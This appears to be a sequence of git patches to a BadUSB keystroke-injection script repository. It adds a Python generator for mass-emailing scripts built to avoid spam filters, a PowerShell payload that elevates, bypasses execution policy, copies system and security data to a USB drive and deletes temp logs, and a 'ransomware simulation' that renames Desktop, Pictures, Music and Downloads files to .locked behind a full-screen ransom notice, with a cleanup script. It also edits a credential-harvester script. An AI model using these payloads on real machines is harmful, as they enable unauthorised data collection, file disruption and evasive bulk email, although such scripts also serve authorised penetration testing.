91bdc6a02bd9fd0383bea5db36f77d924dbe02c2 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 16:25:17 -0400 Subject: [PATCH 26/33] Update EmailSender.txt --- BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt b/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt index f484d3ec..0a33b3bd 100644 --- a/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt +++ b/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt @@ -39,3 +39,4 @@ CTRL ENTER DELAY 5000 DELAY 1000 ALT F4 +REM check out github.com/markcyber for more scripts From 5f95a6d34946ca1554ebd1e8f5cf61afe712db24 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 16:25:52 -0400 Subject: [PATCH 27/33] Create GenerateEmailScripts.py --- .../Emails/GenerateEmailScripts.py | 101 ++++++++++++++++++ 1 file changed, 101 insertions(+) create mode 100644 BadUSB/BadUSB-MarkCyber/Emails/GenerateEmailScripts.py diff --git a/BadUSB/BadUSB-MarkCyber/Emails/GenerateEmailScripts.py b/BadUSB/BadUSB-MarkCyber/Emails/GenerateEmailScripts.py new file mode 100644 index 00000000..16662391 --- /dev/null +++ b/BadUSB/BadUSB-MarkCyber/Emails/GenerateEmailScripts.py @@ -0,0 +1,101 @@ +####################################################################################################################################### +####################################################################################################################################### +################# This script was created by github.com/MarkCyber (w/ assistance of ai) #################### +################# This is a python script to automatically create BadUSB scripts to auto send emails #################### +################# This takes a excel sheet with the columns named "Names" and "Emails" #################### +################# This script will then make a badusb script using the name + email of each person #################### +################# There are various subject options that will be chosen from, to minimize "spam" #################### +################# Change the signature to your name, and put subject options that fit your email #################### +################# Lastly, of course make sure to change the contents of the email to what you want #################### +####################################################################################################################################### +####################################################################################################################################### + +import pandas as pd +import random + +# Load the Excel file, make sure it has the same name (or change the name in this script) +file_path = 'NameAndEmails.xlsx' +data_df = pd.read_excel(file_path) + +# Your excel should have 2 columns. Names, and Emails. +data_cleaned_df = data_df[['Names', 'Emails']].dropna().reset_index(drop=True) +data_cleaned_df.columns = ['Name', 'Email'] + +# List of placeholder subject options. Change these to 7 similar subjects that match your email (if you are sending many. You can use the same if not) +subject_options = [ + "Placeholder for subject option 1", + "Placeholder for subject option 2", + "Placeholder for subject option 3", + "Placeholder for subject option 4", + "Placeholder for subject option 5", + "Placeholder for subject option 6", + "Placeholder for subject option 7" +] + +# Placeholder for email body template. The name field will be filled from the "names" section in the excel sheet you provided. +# Just modify the actual email body and sender name to fit your needs +email_body_template = """ +Hi {name}, + +Placeholder for email body. + +Warm Regards, +Sender Name +""" + +# Function to generate BadUSB script +def generate_badusb_script_with_placeholders_single_file(data_df): + script_template = [ + "DELAY 1000", + "GUI r", + "DELAY 500", + "STRING chrome", + "ENTER", + "DELAY 1000", + "STRING https://mail.google.com/mail/u/0/#inbox?compose=new", # In chrome it opens gmail to compose an email. This is why you must be logged in. + "ENTER", + "DELAY 5000" + ] + + scripts = script_template + + for index, row in data_df.iterrows(): + name = row['Name'] + email = row['Email'] + subject = random.choice(subject_options) + random_delay = random.randint(10000, 25000) + + email_body_lines = email_body_template.format(name=name).strip().split('\n') + email_body_lines = [f"STRING {line.strip()}" for line in email_body_lines if line.strip()] + + email_script = [ + "DELAY 1000", + f"STRING {email}", + "DELAY 500", + "TAB", + "TAB", + f"STRING {subject}", + "TAB" + ] + email_body_lines + [ + "ENTER", + "CONTROL ENTER", + "DELAY 5000", + f"DELAY {random_delay}", #random delay so emails are not sent at the sames, ideally minimizing the potential to be marked as spam + "ALT F4" + ] + + scripts += email_script + + return "\n".join(scripts) + +# Generate the BadUSB script with placeholders and proper send command in a single file +final_script_with_placeholders = generate_badusb_script_with_placeholders_single_file(data_cleaned_df) + +# Save the script to a file +final_script_file_path = 'final_script_with_placeholders.txt' #This would be your badusb script +with open(final_script_file_path, 'w') as file: + file.write(final_script_with_placeholders) + +print(f"Script saved to {final_script_file_path}") + +#check out github.com/markcyber for more badusb / pen testing / automation tools and scripts From 9109f85a8ecd1c5026fa803afa88deca818241fc Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 16:26:17 -0400 Subject: [PATCH 28/33] Update CredentialHarvester.txt --- BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt b/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt index 809d3759..d7a27cea 100644 --- a/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt +++ b/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt @@ -3,7 +3,7 @@ REM ############## This script was created by github.com/markcyb REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ############## REM ############## The extracted data will require decryption ############## REM ################################################################################################################## -REM Open PowerShell with elevated privileges +REM Open PowerShell DELAY 1000 GUI r DELAY 500 @@ -51,3 +51,4 @@ REM Close PowerShell STRING exit ENTER DELAY 500 +REM Check out Github.com/MarkCyber for more badusb scripts and other hacky stuff From 11e02f29316f914e92dedaf487214a0e07c9afd8 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 16:26:46 -0400 Subject: [PATCH 29/33] Create VulnerabilityScanner.txt --- .../HackStuff/VulnerabilityScanner.txt | 630 ++++++++++++++++++ 1 file changed, 630 insertions(+) create mode 100644 BadUSB/BadUSB-MarkCyber/HackStuff/VulnerabilityScanner.txt diff --git a/BadUSB/BadUSB-MarkCyber/HackStuff/VulnerabilityScanner.txt b/BadUSB/BadUSB-MarkCyber/HackStuff/VulnerabilityScanner.txt new file mode 100644 index 00000000..51e1b0d0 --- /dev/null +++ b/BadUSB/BadUSB-MarkCyber/HackStuff/VulnerabilityScanner.txt @@ -0,0 +1,630 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script acts as a plug-in vulnerability scanner. Only use with permission %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This will require a secondary USB named as "MYUSB" to save all information onto %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This will find information on the following and save results in a results.txt file %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Info on: password policy, audit services, network settings, softwares and versions, CVEs %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Info on: open ports, firewall status, antivirus status, smbv1 status, missing updates & more %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +REM Open Start Menu +CONTROL ESCAPE +DELAY 2000 +STRING powershell +REM Navigate to the context menu to run PowerShell as an administrator +DELAY 500 +RIGHTARROW +DELAY 100 +DOWNARROW +DELAY 100 +ENTER +DELAY 3000 +ALT Y +DELAY 5000 +REM Set PowerShell Execution Policy to Bypass +DELAY 1000 +STRING set-executionpolicy bypass -scope process -force +DELAY 200 +ENTER +DELAY 200 +REM Create the PowerShell script in memory and execute it +DELAY 200 +STRING $usbName = "MYUSB" +DELAY 200 +ENTER +DELAY 200 +STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter +DELAY 200 +ENTER +DELAY 200 +STRING if ($usbDrive) { +DELAY 200 +ENTER +DELAY 200 +STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName +DELAY 200 +ENTER +DELAY 200 +STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner +DELAY 200 +ENTER +DELAY 200 +STRING New-Item -ItemType Directory -Path $directoryPath +DELAY 200 +ENTER +DELAY 200 +STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt" +DELAY 200 +ENTER +DELAY 200 +STRING "" > $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING function check-passwordpolicy { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING net accounts +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking password policy: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function audit-services { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-service | select-object name, displayname, status, starttype +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error auditing services: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-networksettings { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-netipconfiguration +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking network settings: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-softwarevulnerabilities { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking software vulnerabilities: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-cve { +DELAY 200 +ENTER +DELAY 200 +STRING param ( +DELAY 200 +ENTER +DELAY 200 +STRING [string]$productname, +DELAY 200 +ENTER +DELAY 200 +STRING [string]$version +DELAY 200 +ENTER +DELAY 200 +STRING ) +DELAY 200 +ENTER +DELAY 200 +STRING $initialDelay = 2 +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version" +DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds $initialDelay +DELAY 200 +ENTER +DELAY 200 +STRING $response = invoke-restmethod -uri $uri -method get +DELAY 200 +ENTER +DELAY 200 +STRING if ($response.totalresults -gt 0) { +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($cve in $response.result.cve_items) { +DELAY 200 +ENTER +DELAY 200 +STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING "no cves found for $productname $version" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking CVEs: $_" +DELAY 200 +ENTER +DELAY 200 +STRING if ($_.Exception -match '403') { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..." +DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds 60 +DELAY 200 +ENTER +DELAY 200 +STRING $retryResponse = invoke-restmethod -uri $uri -method get +DELAY 200 +ENTER +DELAY 200 +STRING if ($retryResponse.totalresults -gt 0) { +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($cve in $retryResponse.result.cve_items) { +DELAY 200 +ENTER +DELAY 200 +STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING "no cves found for $productname $version" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function analyze-logs { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-eventlog -logname system -newest 100 +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error analyzing logs: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-openports { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING netstat -an +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking open ports: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-missingupdates { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Checking Windows Update logs..." +DELAY 200 +ENTER +DELAY 200 +STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log" +DELAY 200 +ENTER +DELAY 200 +STRING Get-WindowsUpdateLog -LogPath $updateLogPath +DELAY 200 +ENTER +DELAY 200 +STRING write-output "WindowsUpdate.log written to $updateLogPath" +DELAY 200 +ENTER +DELAY 200 +STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error getting Windows Update log: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-firewallstatus { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING netsh advfirewall show allprofiles +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking firewall status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-smbv1status { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-windowsoptionalfeature -online -featurename smb1protocol +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking SMBv1 status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-antivirusstatus { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-mpcomputerstatus +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking antivirus status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING check-passwordpolicy >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING audit-services >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-networksettings >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-softwarevulnerabilities >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING analyze-logs >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-openports >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-missingupdates >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-firewallstatus >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-smbv1status >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-antivirusstatus >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +REM Dynamically identify critical software from running processes and scheduled tasks +STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique +DELAY 200 +ENTER +DELAY 200 +STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique +DELAY 200 +ENTER +DELAY 200 +REM Combine running software and scheduled tasks +STRING $softwareList = @() +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($process in $runningSoftware) { +DELAY 200 +ENTER +DELAY 200 +STRING $softwareList += $process.Name +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($task in $scheduledTasks) { +DELAY 200 +ENTER +DELAY 200 +STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun) +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +REM Remove duplicates and empty entries +STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" } +DELAY 200 +ENTER +DELAY 200 +REM Check CVEs for identified software +STRING foreach ($software in $softwareList) { +DELAY 200 +ENTER +DELAY 200 +STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion +DELAY 200 +ENTER +DELAY 200 +STRING if ($version) { +DELAY 200 +ENTER +DELAY 200 +STRING check-cve -productname $software -version $version >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10) +DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds $initialDelay +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Results saved to USB drive." +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error: USB drive MYUSB not found." +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING invoke-command -scriptblock $script +DELAY 200 +ENTER +DELAY 20000 +REM check out github.com/markcyber for more badusb/pen testing scripts and tools From e8a708408e614b268093919b04b786a30b5c02de Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 16:27:41 -0400 Subject: [PATCH 30/33] Create RansomwareSimulation1.txt --- .../RansomwareSimulation1.txt | 91 +++++++++++++++++++ 1 file changed, 91 insertions(+) create mode 100644 BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt diff --git a/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt new file mode 100644 index 00000000..b35bd533 --- /dev/null +++ b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt @@ -0,0 +1,91 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script simulates a ransomware attack by changing file extensions and displays a message %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Renaming file extensions renders each file unusable until the proper extension is added %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Run (1.1)RansomwareSimulationCleanup to revert the changes and renaming of extensions %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +GUI r +DELAY 1000 +REM opens powershell (this is for windows machines) +STRING powershell +ENTER +DELAY 3000 +REM Define the locations using correct SpecialFolder enumerations +STRING $folders = @( +DELAY 500 +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::Desktop, +DELAY 500 +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::MyPictures, +DELAY 500 +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::MyMusic, +DELAY 500 +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::Downloads +DELAY 500 +ENTER +DELAY 500 +STRING ) +DELAY 500 +ENTER +DELAY 500 +REM Iterate over each location +STRING foreach ($folder in $folders) { +DELAY 500 +ENTER +DELAY 500 +STRING $path = [Environment]::GetFolderPath($folder) +DELAY 500 +ENTER +DELAY 500 +REM Get all files in the path and rename them +STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') } +DELAY 500 +ENTER +DELAY 500 +STRING } +DELAY 500 +ENTER +DELAY 2000 +REM Display ransomware message +STRING Add-Type -AssemblyName PresentationFramework +DELAY 500 +ENTER +DELAY 500 +STRING $Window = New-Object System.Windows.Window +DELAY 500 +ENTER +DELAY 500 +STRING $Window.WindowStartupLocation = 'CenterScreen' +DELAY 500 +ENTER +DELAY 500 +STRING $Window.WindowState = 'Maximized' +DELAY 500 +ENTER +DELAY 500 +STRING $Window.Topmost = $true +DELAY 500 +ENTER +DELAY 500 +STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.' +DELAY 500 +ENTER +DELAY 500 +STRING $Window.ShowDialog() +DELAY 500 +ENTER +DELAY 2000 +STRING exit +DELAY 500 +ENTER +REM check out my github at github.com/markcyber for more badusb & hacking type tools From 1952a0075b94fa39cc75b3be3e891aa1a2986d74 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 16:28:14 -0400 Subject: [PATCH 31/33] Create RansomwareSimulation2(cleanup).txt --- .../RansomwareSimulation2(cleanup).txt | 62 +++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2(cleanup).txt diff --git a/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2(cleanup).txt b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2(cleanup).txt new file mode 100644 index 00000000..3be26299 --- /dev/null +++ b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2(cleanup).txt @@ -0,0 +1,62 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This can be ran multiple times if necessary %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +GUI r +DELAY 2000 +STRING powershell +ENTER +REM increased delays to make sure each command can go through even on slower computers +DELAY 6000 +REM Define the locations using correct SpecialFolder enumerations +STRING $folders = @( +DELAY 1000 +ENTER +DELAY 1000 +STRING [System.Environment+SpecialFolder]::Desktop, +DELAY 1000 +ENTER +DELAY 2000 +STRING [System.Environment+SpecialFolder]::MyPictures, +DELAY 1000 +ENTER +DELAY 2000 +STRING [System.Environment+SpecialFolder]::MyMusic, +DELAY 1000 +ENTER +DELAY 2000 +STRING [System.Environment+SpecialFolder]::Downloads +DELAY 1000 +ENTER +DELAY 2000 +STRING ) +DELAY 1000 +ENTER +DELAY 3000 +REM Iterate over each location +STRING foreach ($folder in $folders) { +DELAY 1000 +ENTER +DELAY 1000 +STRING $path = [Environment]::GetFolderPath($folder) +DELAY 1000 +ENTER +DELAY 4000 +REM Get all .locked files in the path and rename them back +STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace '\.locked$', '') } +DELAY 2000 +ENTER +DELAY 5000 +STRING } +DELAY 1000 +ENTER +DELAY 4000 +STRING exit +DELAY 1000 +ENTER +REM Check out github.com/MarkCyber for more badusb scripts, malware and pen testing stuff From ac6b7e350a0a36ac5247448412bf14b919d88cc0 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 16:28:38 -0400 Subject: [PATCH 32/33] Rename RansomwareSimulation2(cleanup).txt to RansomwareSimulation2-cleanup.txt --- ...Simulation2(cleanup).txt => RansomwareSimulation2-cleanup.txt} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename BadUSB/BadUSB-MarkCyber/RansomwareSimulation/{RansomwareSimulation2(cleanup).txt => RansomwareSimulation2-cleanup.txt} (100%) diff --git a/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2(cleanup).txt b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2-cleanup.txt similarity index 100% rename from BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2(cleanup).txt rename to BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2-cleanup.txt From a051c3a3dc98da0ddd05138fbf1890249a0d33e8 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 16:29:49 -0400 Subject: [PATCH 33/33] Delete BadUSB/MarkCyber-BadUSB directory --- .../MarkCyber-BadUSB/Emails/EmailSender.txt | 41 -- .../Emails/GenerateEmailSend.py | 101 --- .../HackerStuff/CredentialHarvester.txt | 54 -- .../HackerStuff/VulnerabilityScanner.txt | 630 ------------------ .../RansomwareSimCleanup.txt | 62 -- .../RansomwareSimMain.txt | 91 --- 6 files changed, 979 deletions(-) delete mode 100644 BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt delete mode 100644 BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py delete mode 100644 BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt delete mode 100644 BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt delete mode 100644 BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt delete mode 100644 BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt diff --git a/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt b/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt deleted file mode 100644 index f484d3ec..00000000 --- a/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt +++ /dev/null @@ -1,41 +0,0 @@ -REM 